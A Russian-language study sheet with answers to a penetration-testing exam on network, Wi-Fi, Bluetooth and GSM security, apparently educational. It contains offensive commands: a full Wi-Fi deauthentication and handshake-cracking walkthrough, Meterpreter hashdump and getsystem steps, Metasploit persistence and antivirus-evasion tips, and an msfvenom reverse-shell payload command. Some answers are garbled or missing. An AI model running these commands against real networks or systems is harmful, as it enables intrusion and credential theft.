Andrey's

Logo

projects @GitHub

My Stats

Connect with me:

www Badge   Email Badge   Contact-form Badge  

Безопасность проводных и беспроводных сетей.

Темы тестирования

Следует учитывать, что использование подобных методов может быть незаконным и опасным. DANGER !

Ст. № 273- УК- РФ Консультант Ст. 273 УК РФ

https://www.geekbrains.ru

https://www.securitylab.ru

OpenVAS

https://habr.com/ru/articles/203766/ https://dzen.ru/a/YlP_CLkNm2k3E9ek https://www.ceos3c.com/security/install-openvas-kali-linux/ https://spy-soft.net/best-vulnerability-scanners/


Тест


1. Вам нужно проверить, содержит ли WiFi-дамп полезную информацию для взлома. Выберите правильный вариант команд, которые можно для этого использовать.

Для проверки, содержит ли WiFi-дамп полезную информацию для взлома, можно использовать следующие команды: Перевод адаптера Wi-Fi в режим монитора. Например, для интерфейса Wlan0 нужно ввести команду airmon-ng start wlan0. Сканирование точек доступа. Для этого используется команда airodump-ng wlan0mon. На экране появится список точек доступа в радиусе досягаемости. Использование инструментов для взлома. Например, для перебора паролей по словарю можно применить команду aircrack-ng handshake.cap -w dict.txt. Также для взлома с помощью радужных таблиц подойдёт инструмент cowpatty. Пример команды: cowpatty -r wifi.cap -f dict.txt -s raaj -s: SSID. Преобразование файла в стандартный хэш. Для этого можно использовать инструмент hcxpcapng. Например, команда hcxpcapngtool –john hash.john wifi.cap. Важно помнить, что использование подобных команд может быть незаконным и опасным.

2. Можно ли и в каком разделе проводить сканирование OpenVAS, используя известные логины\пароли от сервисов (например, для тестирования на проникновение по принципу white box)?

3. Каким выражением в WireShark можно отфильтровать промаркированные (в целях удобства) аналитиком пакеты в дампе:

4. Одна из наиболее громких в последние годы уязвимостей в протоколе Bluetooth. Выберите правильный вариант:

5. Каталог Auxiliary в Metasploit Framework используется для:

6. Какую команду в Meterpreter необходимо использовать для получения дампа хэшей паролей скомпрометированной Windows системы? В каком файле хранятся хэши паролей?

Для получения дампа хэшей паролей в Meterpreter необходимо использовать команду hashdump. Она позволяет выгрузить любые LM или NTLM хэши в целевой системе. Хэши паролей в Windows хранятся в файле SAM (Security Accounts Manager) в каталоге %systemroot%\system32\config (под %systemroot% понимается каталог с операционной системой — по умолчанию соответствует каталогу C:\WINDOWS)

7. Для чего предназначена следующая команда: openssl genrsa -out ca.key 4096?

private-key (закрытый ключ)

8. Как можно закрепиться с помощью MSF в атакуемой Windows-системе?

Чтобы закрепиться с помощью Metasploit (MSF) в атакуемой Windows-системе, можно использовать скрипт persistence. Он создаёт бэкдор, который запускается при каждой загрузке системы. Также для закрепления доступа можно сгенерировать полезную нагрузку с помощью MSFvenom. Затем разместить её на компьютере цели и, например, добавить файл в автозагрузку. Ещё один способ — использовать модуль сохранения доступа (опция -S). Важно помнить, что использование подобных методов может быть незаконным и опасным. Рекомендуется обратиться к специалисту. Шаги по эксплуатации целевой системы с помощью MSF: Выбрать и настроить эксплойт (код, компрометирующий конкретную уязвимость на целевой системе). Проверить целевую систему, чтобы определить, подвержена ли она атаке с помощью эксплойта. Этот шаг является необязательным и обычно опускается, чтобы свести к минимуму обнаружение. Выбрать и настроить полезную нагрузку (код, который будет выполняться в целевой системе, после успешной эксплуатации). Выбрать метод кодирования, чтобы обойти средства обнаружения (идентификаторы/IP-адреса или антивирусное программное обеспечение). Выполнить эксплойт.

9. Что из перечисленного наиболее подходит под определение «Влияние уязвимости (Impact)»:

Confidentiality Impact (влияние на конфиденциальность). Integrity Impact (влияние на целостность). Availability Impact (влияние на доступность). Под определение подходят три метрики воздействия: Confidentiality Impact (влияние на конфиденциальность). Описывает возможное прямое влияние на IT-систему в случае эксплуатации уязвимости с точки зрения разглашения данных. Integrity Impact (влияние на целостность). Отображает влияние успешной эксплуатации уязвимости на целостность системы, связанную с достоверностью и точностью информации. Availability Impact (влияние на доступность). 1 Учитывает атаки, потребляющие пропускную способность сети, циклы процессора или дисковое пространство, которые влияют на доступность системы. Эти метрики описывают возможное прямое влияние на IT-систему в случае эксплуатации уязвимости независимо с точки зрения конфиденциальности, целостности и доступности.

10. Какая из ниже приведенных команд позволяет вывести список возможных обновлений и отфильтровать только обновления безопасности?

11. Какую утилиту можно использовать для определения версии OC на сканируемом хосте и получить сведения, какое ПО висит на открытых портах, если под рукой не оказалось NМар?

Проверить порт сервера на доступность можно следующими способами: telnet, ping, traceroute. Проверка пропускной способности сети с помощью iPerf. X probe. Линуксовая утилита, использующая активные методы фингерпринтинга на основе методик и сценариев, что применяются в Nmap. Помимо определения ОС на удалённом хосте с использованием ICMP-запросов, в возможности программы входит сканирование TCP- и UDP-портов. Ettercap. Сниффер, который после установки и запуска начинает сниффить трафик в сети и собирать результат в создаваемых программой профайлах, откуда его можно извлечь для анализа. Этот анализ позволяет установить IP-адрес, имя и тип хоста, предположительную версию работающей там ОС, открытые порты и запущенные сервисы. Amap. Сканер, позволяющий отследить сервисы, работающие на нестандартных портах. Можно использовать совместно с любым другим сканером: сканер определяет список открытых портов на хосте, а Amap потом прощупывает этот диапазон и выясняет, какие именно службы используют эти порты. Для определения версии ОС на сканируемом хосте и получения сведений об открытых портах можно использовать утилиту Nmap - это сетевой сканер, который ищет открытые порты, умеет идентифицировать операционную систему устройства, сервисы и их версии, которые запущены на сканируемом хосте.

12. Какими классами средств защиты можно обнаруживать и предотвращать атаки на WIFI-сеть?

https://www.securitylab.ru/analytics/378647.php

13. Можно ли с помощью NMap выявлять и эксплуатировать уязвимости в результатах сканирования:

Nmap позволяет выявлять уязвимости в результатах сканирования. nmap –script vuln 192.168.1.1.

Nmap позволяет выявлять уязвимости в результатах сканирования. Для этого в инструменте есть богатая библиотека скриптов для обнаружения конкретных уязвимостей. Например, скрипт vulscan берёт название ПО и прогоняет его по базам уязвимостей: CVE, OSVBD, SecurityFocus и SecurityTracker. Для поиска уязвимостей можно использовать команду nmap –script vuln 192.168.1.1. Этот скрипт из NSE выполняет быстрое сканирование на наличие известных уязвимостей, что может быть полезно для первоначальной оценки безопасности системы. Для эксплуатации уязвимостей Nmap можно использовать в сочетании с другими инструментами, например Metasploit. Metasploit Framework использует данные, полученные от Nmap, для автоматизации атак и тестов на проникновение.

14. Какая из приведенных аббревиатур является модулем идентификации абонента?

Аббревиатура- [ ] SIM расшифровывается как Subscriber Identification Module, то есть «**модуль- [ ] **идентификации*- [ ] **абонента».

15. Ст. 273- [ ] **УК- [ ] **РФ. Создание, использование и распространение вредоносных компьютерных программ.

16. Вам необходимо продемонстрировать повышение привилегий до NT_AUTHORITY\SYSTEM после проникновения на удаленный узел,

каким образом можно это сделать?

Рекурсивное удаление содержимого фиксированной папки можно использовать для повышения привилегий до уровня SYSTEM, если папка доступна злоумышленнику для записи от имени учетной записи SYSTEM или администратора. Чтобы повысить привилегии до NT AUTHORITY\SYSTEM в Meterpreter, можно выполнить команду getsystem. Порядок действий: Подключить модуль, в котором реализована команда getsystem: meterpreter > use priv. Проверить, загружена ли команда, выполнив её с переключателем -h, чтобы отобразить доступные опции: meterpreter > getsystem -h. Запустить getsystem без каких-либо опций, чтобы скрипт попробовал все доступные методы и остановился при успехе. Проверить, что сеанс запущен с привилегиями NT AUTHORITY\SYSTEM, выполнив команду getuid: meterpreter > getuid Server username: NT AUTHORITY\SYSTEM.

17. Какая из перечисленных утилит может использоваться для bruteforce-атаки на hash-паролей на GPU?

Для bruteforce-атаки на hash-пароли на GPU могут использоваться следующие утилиты: Extreme GPU Bruteforcer (EGB). Программа предназначена для восстановления паролей к хэшам различных типов, используя мощности видеопроцессора (GPU). Поддерживает алгоритмы хэширования MD5, MySQL и NTLM. Elcomsoft Distributed Password Recovery (EDPR). Программа содержит плагины, оптимизированные для использования видеокарт в брутфорсе. Поддерживает игровые видеокарты Nvidia, начиная с GeForce GTX 4xx и новее, AMD Radeon серий HD 5000–HD 8000, более современные AMD R9 и RX, а также профессиональные видеокарты (все серии Nvidia Quadro и AMD FirePro).

18. В каких файлах хранятся захешированные пароли и учетные данные в текстовом виде в Linux-системах?

Информацию об учетных записях ОС Linux хранит в файле /etc/passwd

Он содержит следующее, где: User ID - логин; Password – наличие пароля; UID - идентификатор пользователя; GID - идентификатор группы по умолчанию; User Info – вспомогательная информация о пользователе (полное имя, контакты и т.д.). Файл /etc/shadow имеет следующую структуру:

loginID:password:lastchg:min:max:warn:inactive:expire

где: loginID – имя пользователя; password – пароль в зашифрованном виде; lastchg – количество дней c 1.01.1970, когда пароль был изменен в последний раз; min – минимальное число дней между сменами пароля; max – максимальное число дней, в течении которых пароль будет валиден; warn – количество дней за которые пользователь будет предупрежден об истечении пароля; inactive – количество дней, в течении которых пользователь может быть неактивен перед блокировкой; expire – дата, когда истекает срок пользовательской учетной записи.

19. Расшифруйте базовую оценку CVSSv3. В каком из векторов CVSSv3 присутствуют перечисленные метрики: сложность атаки — низкая, вектор атаки — сетевой, влияние на доступность — высокое?

(по условию AC:L AV:N A:H)

Базовая оценка (BS) в CVSSv3 включает следующие критерии: Вектор атаки (AV). Может быть сетевым (N), смежной сетью (A), локальным (L) или физическим (P). Сложность атаки (AC). Может быть высокой (H) или низкой (L). Уровень привилегий (PR). Может быть высоким (H), низким (L) или не требующимся (N). Взаимодействие с пользователем (UI). Может быть требуется (R) или не требуется (N). Влияние на другие компоненты системы (S). Может не оказывать влияния (U) или оказывать (C). Влияние на конфиденциальность (С). Может не оказывать влияния (N), быть низким (L) или высоким (H). Влияние на целостность (I). Может не оказывать влияния (N), быть низким (L) или высоким (H). Влияние на доступность (A). Может не оказывать влияния (N), быть низким (L) или высоким (H).

20. С какими из перечисленных утилит можно интегрировать MSF?

Некоторые утилиты, которые можно интегрировать с Metasploit Framework (MSF): InlineEgg. Утилита для создания ассемблерного кода средствами Python. Ассемблерные команды можно использовать для создания эффективных шёлкодов для эксплойтов. MSF имеет интерфейс для InlineEgg шёлкодов, использующий модуль ExternalPayload. Impurity. Обеспечивает интерфейс для разработки шёлкодов на C. Результат работы можно поместить в память как исполняемый ELF-образ. MSF имеет загрузчик (только для Linux) для исполняемых файлов Impurity. UploadExec. Позволяет загрузить любой исполняемый Win32-файл на эксплойтируемый хост и запустить его.

21. Какую информацию с поддельного маршрутизатора рассылает злоумышленник для того, чтобы провести атаку на протокол RIP?

Чтобы изменить поведение RIPv1 для проведения DdoS-атаки, злоумышленник может отправить такой же запрос, подменив исходящий IP адресом объекта атаки. Адресаты выбираются по заранее подготовленному списку маршрутизаторов с поддержкой RIPv1, которые имеют подозрительно большое количество маршрутов в таблицах. В результате одиночного запроса генерируется большое количество пакетов с 504-байтовой нагрузкой, отправляемых на атакуемый адрес. На один запрос может отправляться несколько ответов по причине ограничения в 25 маршрутов на один RIP-пакет. Со стороны атакуемого видны только ответы на запросы RIPv1, которые он, разумеется, не делал. Навязывание ложного RIP-маршрутизатора X для перехвата трафика между сетями P и Q - возможна ситуация, когда значение вектора, объявляемого, например, маршрутизатором В: Q=1. В этом случае Х не может немедленно предложить лучшего маршрута, но он может применить следующий прием. Сначала, выбрав паузу в рассылке RIP-сообщений маршрутизатором В, Х от имени В отправляет в А вектор Q=16, что заставит маршрутизатор А удалить из своей таблицы маршрут в сеть Q, так как до этого А отправлял датаграммы в Q через В. Сразу же вслед за этим Х отправляет вектор Q=1 от своего имени, и А устанавливает маршрут в сеть Q через Х. Последующие векторы Q=1 от В будут проигнорированы, поскольку они не предлагают лучшего маршрута.

22. В процессе анализа дампа мы обнаружили в ответных пакетах от интересующих нас хостов RST, ACK-флаги. Что они означают?

RST и ACK-флаги в ответных пакетах от хостов могут означать следующее: RST. Флаг RESET установлен, чтобы сообщить другому концу разорвать TCP-соединение. Это делается, если соединение по какой-то причине разорвалось, если соединение не существует или если пакет каким-то образом неправильный. ACK. Пакеты с этим флагом используются, чтобы подтвердить, что пакеты данных получены, а также подтвердить запрос на инициализацию и запрос на разрыв соединения. Например, RST/ACK может означать, что устройство подтверждает данные, отправленные в предыдущем пакете в последовательности с ACK, а затем уведомляет отправителя, что соединение закрыто с RST. Это происходит, например, когда принимающий хост не слушает на целевом порту TCP.

TCP Reset (TCP RST ACK) - что это и как искать причину? Каждый TCP пакет несёт заголовок и в нем есть биты завершения соединения: RST — обычно этот бит установлен в «0» и ничего не значит. Но иногда он получает значение 1 и это ведет к немедленному прекращению данного соединения. Хорошо это или плохо, так как красный сигнал не предвещает ничего хорошего? Все, конечно же, зависит от ситуации, когда они происходят.

TCP RST ACK – это нормальный и предусмотренный RFC 793 процесс разрыва соединения, но если их много и это оказывает влияние на производительность приложения и пользователей, то это бесспорно повод задуматься. Как всегда дьявол кроется в деталях и необходимо задать себе несколько вопросов.

Фильтры Wireshark для TCP. Чтобы увидеть только трафик TCP: tcp - чтобы увидеть только трафик. Показать TCP пакеты с включённым флагом SYN и отключённым флагом ACK: tcp.flags.syn==1 && tcp.flags.ack==0 RST tcp.flags.reset==1

23. Какой из приведенных вариантов содержит наиболее подходящие методы защиты для сетей на базе сигнального протокола Diameter, учитывая выявленные в нем слабые места?

Для защиты сетей на базе сигнального протокола Diameter от уязвимостей рекомендуется комплексный подход. Некоторые методы, которые могут быть использованы: Регулярный анализ защищённости. Он поможет выявить уязвимости, оценить текущий уровень защищённости и потенциальные риски, выработать защитные меры и проверить их эффективность. Важно поддерживать параметры безопасности в актуальном состоянии и проводить анализ защищённости при любых изменениях в сети, например при изменении конфигурации или внедрении нового оборудования. Использование активного фаервола. Такие решения контролируют SS7, Diameter, GTP и SMS-трафик, снабжаются встроенной аналитикой, способны сопоставлять происходящие события и реагировать на атаки. Проверка легитимности сообщений. Если оператор разрешает абонентам регистрироваться в чужих сетях, сообщения, поступающие из других сетей, должны проверяться на легитимность. Выбор наиболее подходящих методов защиты зависит от конкретных условий и требований безопасности.

24. Какой из перечисленных методов HTTP необходимо искать в случае подозрения перехвата логина и пароля в открытом виде при разборе дампа сетевого трафика в WireShark:

В случае подозрения перехвата логина и пароля в открытом виде при разборе дампа сетевого трафика в Wireshark необходимо искать метод POST. Для этого нужно применить фильтр http.request.method == «POST»

25. Мы хотим запустить наш WiFi-адаптер в режим мониторинга, какую команду будем использовать при работе с пакетом air-?

26. С какой целью администратор сети может включать неразборчивый режим (promiscuous mode) на сетевом интерфейсе?

Promiscuous mode — это «неразборчивый» режим, в котором сетевая плата позволяет принимать все пакеты независимо от того, кому они адресованы. Этот режим позволяет мониторить трафик только в данном коллизионном домене (для Ethernet или беспроводных сетей) или кольце (для сетей Token ring или FDDI). «Неразборчивый» режим часто используется снифферами — специализированными программами, позволяющими отображать и анализировать сетевой трафик для диагностики сетевых неполадок. Такие программы позволяют легко перехватывать пароли и конфиденциальные данные, передаваемые по сети в незащищённом виде.

27. Выберите один из наиболее подходящих способов, которым может воспользоваться злоумышленник для сбора информации о жертве (цели атаки), но при этом с минимальными активными действиями и оставлением следов.

Пробив. Использование ботов. Поиск в закрытых источниках. Сканирование уязвимостей. Несколько методов, которые злоумышленник может использовать для сбора информации о жертве с минимальными активными действиями и оставлением следов: Пробив. Раскрытие конфиденциальных данных о человеке за вознаграждение. Источниками могут быть операторы сотовой связи, государственные информационные системы, банки и другие финансовые учреждения. Использование ботов в мессенджерах. Они собирают данные из утечек. Поиск в закрытых источниках. Злоумышленник может использовать частные источники, базы данных, платные подписки и, если потребуется, тёмную сторону интернета. Сканирование уязвимостей. С его помощью проверяют соответствие конфигурации целевого хоста или приложения цели конкретного эксплойта, а также собирают информацию о запущенном программном обеспечении и номерах версий с помощью баннеров сервера, прослушиваемых портов или других сетевых артефактов. Сочетание инструментов по проникновению с легальным ПО. Это позволяет минимизировать обнаружение атаки, так как доверенные программы внесены в «белые списки» систем безопасности.

28. При первом старте после установки OpenVAS мы получаем уведомление в веб-интерфейсе, что не обновлены базы данных уязвимостей NVT. Каким из ниже приведенных вариантов их можно обновить?

openvas-nvt-sync, openvassd, openvasmd –rebuild, openvas-scapdata-sync, openvas-certdata-sync.

Обновить базы данных уязвимостей NVT в OpenVAS можно двумя способами: Через веб-интерфейс. Для этого нужно перейти в раздел «Администрирование» и поочерёдно обновить базы данных в разделах nvt, scap и cert. Из командной строки. Для этого нужно выполнить следующие команды: openvas-nvt-sync, openvassd, openvasmd –rebuild, openvas-scapdata-sync, openvas-certdata-sync. Также обновить фиды OpenVAS, включая NVTs (тесты сетевых уязвимостей), можно с помощью команды sudo gvm-feed-update. Этот процесс может занять некоторое время, так как загружает необходимые данные для сканирования уязвимостей.

29. Как называется атака, в результате которой злоумышленник, подменив в заголовке пакета IP-адрес источника на IP-адрес жертвы, отправляет такие пакеты на уязвимый DNS-сервер, который в результате на пакет небольшого размера отдает пакет в несколько раз больше, из-за чего на узел жертвы происходит DDOS-атака?

DNS Amplification (DNS усиление). Если использовать в качестве исходного IP-адреса при отправке запроса адрес компьютера жертвы (ip spoofing), то уязвимый DNS-сервер будет посылать в большом количестве ненужные пакеты компьютеру-жертве, пока полностью не парализует его работу. TCP SYN Flood. Цель атаки SYN Flood – вызвать перерасход ресурсов системы. На каждый входящий SYN-пакет система резервирует определенные ресурсы в памяти, генерирует ответ SYN+ACK, содержащий криптографическую информацию, осуществляет поиск в таблицах сессий и т. д. – то есть затрачивает процессорное время. Отказ в обслуживании наступает при потоке SYN Flood от 100 до 500 тыс. пакетов за секунду. А злоумышленник, имея хотя бы гигабитный канал, получает возможность направить поток до 1,5 млн пакетов в секунду. Smurf-атаки. Атакующий посылает поддельный пакет IСМР Echo по адресу широковещательной рассылки. При этом адрес источника пакета заменяется адресом жертвы, чтобы «подставить» целевую систему. Поскольку пакет Еcho послан по широковещательному адресу, все машины усиливающей сети возвращают жертве свои ответы. Послав один пакет IСМР в сеть из 100 систем, атакующий инициирует усиление DDoS-атаки в сто раз. Чтобы предотвратить эффект усиления, специалисты по сетевой безопасности советуют запретить операции прямой широковещательной рассылки на всех граничных маршрутизаторах. Также дополнительно стоит установить в ОС режим «тихого» отбрасывания широковещательных эхо-пакетов IСМР.

30. Для чего предназначен параметр ClockOffset, передаваемый при взаимодействии Bluetooth-устройств?

Clock Offset Bluetooth-устройств — это смещение частоты тактов для каждого обнаруженного устройства. В процессе поиска master-устройство получает от ответчиков значение тактового генератора. Затем, на этапе установления соединения, master-устройство передаёт предполагаемое значение смещения тактового генератора для slave-устройства, тем самым ускоряя процесс синхронизации двух генераторов. Для чтения смещения тактов (clock offset) можно использовать команду clkoff в утилите hcitool. Она позволяет прочитать этот параметр для устройства по Bluetooth-адресу bdaddr. Также для получения смещения между часами Bluetooth двух подключённых устройств можно использовать команду HCI Read Clock Offset.

31. С каким уровнем привилегий должен быть запущен NMap, чтобы полноценно произвести TCP-сканирование и почему?

root. флаг –privileged. Для полноценного TCP-сканирования Nmap должен быть запущен с привилегиями суперпользователя (root). Это необходимо, потому что для некоторых типов сканирования, в том числе TCP SYN, требуется отправлять и принимать сырые пакеты, а для этого нужны права пользователя root на Unix-системах. Под Windows рекомендуется работать с учётной записью администратора, хотя иногда Nmap работает и с непривилегированными пользователями, когда в ОС уже загружена утилита WinPcap. Однако есть способ запустить Nmap и без привилегий суперпользователя, но при этом поддержать все продвинутые функции и методы сканирования портов. Для этого нужно использовать флаг –privileged и сообщить программе через него, что у неё есть все необходимые возможности, хотя пользователь не является root.

32. Сигнальный протокол для передачи служебных данных в современных 4G сетях называется:

Diameter — сигнальный протокол, используемый в телекоммуникационных сетях для передачи служебных данных.

33. Назовите сигнальный протокол используемый в телекоммуникационных сетях для передачи служебных данных вплоть до 4G.

Diameter — сигнальный протокол, используемый в телекоммуникационных сетях для передачи служебных данных в сетях 4G.

34. Какая из команд используется при атаке по типу деаутентификации?

При атаке по типу деаутентификации используется команда aireplay-ng -0 …

# Пример
ifconfig
# Теперь для включения режима монитора введите следующую команду:
sudo airmon-ng start wlan0
# Режим мониторинга включен, теперь мы должны убить все PID, которые мешают работе адаптера, Эти процессы выделены красным цветом в примере выше. Убить процессы можно с помощью команды kill:
kill 508 1420
# обнаружим беспроводные сети вокруг нас:
airodump-ng wlan0
# интересует сеть под названием Kali на канале 1. Обратите внимание на номер канала и MAC-адрес целевой точки доступа
# Channel: 1
# BSSID: 50:D4:F7:E5:66:F4
airodump-ng -c 1 -w kali --bssid 50:D4:F7:E5:66:F4 wlan0
# перехватываем пакеты, пытаясь перехватить handshake, теперь откройте второе окно для !! деаутентификации !! клиентов из сети. 
aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0
# -0 означает деаутентификацию
# Теперь нам нужно расшифровать handshake. В терминале вводим ls, чтобы перечислить все текущие каталоги и файлы. Выбираем файл с расширением ".cap", который должен называться kali-01.cap, и вводим следующую команду:
aircrack-ng -w wordlist.txt kali-01.cap
# KEY Found ...

35. Что из перечисленных вариантов является наиболее простым методом обнаружения снифферов в сети? С чем это связано?

ARP.AntiSniff. CPM. neped. sentinel. WinSniffer. CommView. ZxSniffer. SpyNet. IRIS. Метод ARP считается наиболее простым методом обнаружения снифферов в сети. Для его использования нужно передать ARP на нешироковещательный адрес. Если машина отвечает на такой ARP своим IP-адресом, значит, она находится в прослушивающем режиме. Простота метода связана с тем, что многие снифферы по умолчанию разрешают неизвестные локальному DNS-кэшу DNS-имена IP-адресов отлавливаемых кадров данных. Если сниффер поймает сообщение с неизвестным ему IP-адресом, он моментально отправит DNS-запрос дефолтному DNS-серверу на разрешение интересующего IP-адреса. Также простым методом обнаружения снифферов может считаться метод DNS. Многие прослушивающие программы автоматически делают запросы обратного DNS IP-адресов, которые они видят. Таким образом, прослушивающий режим можно обнаружить при помощи просмотра DNS-траффика, который он создаёт.

36. Какой из вариантов фильтров будет корректно отрабатывать в случае, если нужно исключить IP-адрес из поиска в WireSharK?

Чтобы исключить пакеты с определённым IP-адресом из поиска в Wireshark, можно использовать оператор !=.

37. Какую утилиту рекомендуется использовать для ускорения процесса одновременного сканирования большого числа целевых IP-

адресов (пулов IP-адресов):

38. Для чего используется следующая команда: nmap –script smb-vuln-ms17-010.nse 192.168.59.4?

39. Для каких целей используется команда genpmk -f …dict/rockyou.txt -d /tmp/rainbow -s teddy? В состав какой программы для теста WIFI-сетей входит используемая в команде утилита?

40. Для включения Bluetooth-адаптера в Kali Linux необходимо ввести команду:

41. Каким образом можно декодировать текст, преобразованный на основе той или иной кодировки:

42. Злоумышленник создает файл, который будет содержать необходимый payload, с помощью команды msfvenom -р

windows/meterpreter/reverse_tcp lhost=192.168.59.5 lport=4444 -f exe -о backdoor.exe. Для каких целей указывается параметр lport=4444, может ли его значение отличаться от указанного?

43. Как злоумышленник может использовать слабости более старых поколений сетей 2G, 3G, при условии что сейчас повсеместно используется 4G?

44. При атаке на сопряжение злоумышленник может подобрать методом перебора PIN-код. Сколько примерно времени займет перебор в случае применения алгоритмов E22, E21, E1, основанных на шифре SAFER+?

По данным, полученным на Pentium 4 HT с частотой 3 ГГц, время перебора PIN-кода разной длины составляет: 1 4 знака — 0,063 секунды; 5 знаков — 0,75 секунды; 6 знаков — 7,609 секунды.

45. Возможно ли сгенерировать полезную нагрузку (payload) в MSF, который не будет обнаруживаться антивирусным ПО?

Например, в Metasploit для этого можно использовать команду msfvenom, которая упрощает процесс перекодирования и встраивания payloadов, но не даёт абсолютных гарантий обхода антивирусов Использовать эксплойты нулевого дня или совершенно новое вредоносное ПО. Оно пройдёт мимо схемы обнаружения, так как компании-разработчики программного обеспечения для AV не встречались с ним ранее. Изменить сигнатуру вредоносного ПО. Если изменить кодировку программы без изменения её функциональности, она должна пройти мимо антивирусного ПО без обнаружения.

45. Абоненты сетей 4G подвержены тем же угрозам, что и абоненты сетей предыдущих поколений?

46. Каким самым простым способом злоумышленник может реализовать атаку «Злой двойник» для прослушивания трафика потенциальных жертв?

Атака “злой двойник” (Evil Twin Attack) - это кибер-атака, относящаяся к спуфингу, при которой хакер создает поддельную точку доступа Wi-Fi, имитирующую подлинную беспроводную сеть, к которой могут подключаться пользователи. Как только пользователь подключается к такой сети “злого двойника”, хакеры могут получить доступ к данным пользователя: от его сетевого трафика до личных регистрационных данных. Атаки “злого двойника” получили свое название благодаря способности хакеров имитировать какую-либо подлинную Wi-Fi сеть до такой степени, что она становится неотличима от поддельной. Этот тип атаки особенно опасен, потому что его практически невозможно идентифицировать. Техника Cafe Latte позволяет злоумышленнику обойти защиту брандмауэра и атаковать ноутбук или организовать атаку «человек посередине» и отслеживать онлайн-активность жертвы.

47. Какой из перечисленных вариантов сканирования рекомендуется, если нужно быстро организовать исследование узла или группы узлов, не задумываясь о настройках? Какой при этом будет использован профиль сканирования OpenVAS?

48. Подсистема сетей и коммутации (NSS), являющаяся фактически ядром сети GSM, включает в себя следующие компоненты:

49. Вы запустили в NMap сканирование типа «arp-пинг». Каким образом в Wireshark можно отфильтровать ответы всех «живых» хостов?

50. Какие значение параметра Quality of Detection выставлено в OpenVAS по умолчанию и на что оно влияет?

51. От какого типа атак могут помочь обучение сотрудников компании основам информационной безопасности, certificate pinning, аудит кода

приложений?

52. Может ли атака на Bluetooth быть затруднена в связи с ограничением дальности действия? Какой максимальный радиус действия у

Bluetooth?

53. Как можно защититься от атаки деаутентификации в WiFi-сети?

54. Почему оптоволоконные линии связи считаются более безопасными по сравнению с другими технологиями передачи данных?

55. Как называется атака, при которой злоумышленник тайно ретранслирует и при необходимости изменяет связь между двумя сторонами, которые считают, что они непосредственно общаются друг с другом?

56. В какое поле ICMP-nakeTa злоумышленник может помещать передаваемую скрыто (стеганографическим методом) информацию:

57. В результате сканирования вы обнаружили нa целевой машине открытый 445-tcp порт. Какую опасную уязвимость какого протокола

можно будет проэксплуатировать в результате этой находки?

58. Какие методы перехвата данных в GSM-сети могут быть реализованы злоумышленником? Выберите наиболее подходящий вариант.

59. После установки OpenVAS в Kali Linux возможно ли сразу войти в веб-интерфейс Greenbone Security Assistance и начать работать?

60. В чем заключается суть блюджекинга?

61. Можно ли использовать Ettercap не только для взлома, но и противодействия или выявления вредоносной активности? Каким образом?

62. Что из приведенных вариантов больше всего подходит под методы защиты от атаки SSLstrip (атака на понижение до http):

63. Назовите один из дешевых способов, который могут использовать злоумышленники для прослушивания пользовательских данных в сети GSM.

64. Какая из нижеприведенных команд в MSF Console позволяет просканировать и попытаться подобрать пароль на обнаруженном ftp-сервере?

65. Какой из перечисленных вариантов подходит под описание Smurf-атаки:

66. Как с помощью утилиты Redfang можно обнаружить скрытые Bluetooth-устройства?

67. Для каких целей рекомендуется выполнять следующую команду: sudo echo “1” > /proc/sys/net/ipv4/ip_forward на

Kali Linux перед проведением МIТМ-атаки в рамках тестирования на проникновение сети?

68. Для чего может использоваться команда wmic qfe get hotfixid?

69. Может ли злоумышленник подключиться к сигнальной сети и пользоваться недостатками протокола, заставлять перенаправлять SMS и трафик абонента через свои устройства?

70. Какой из перечисленных вариантов применим для защиты от атаки поддельного DHCP-cepвepa (Rogue DHCP)?

71. Злоумышленник решил провести DOS-атаку на Bluetooth-устройство. Какими способами он может это сделать?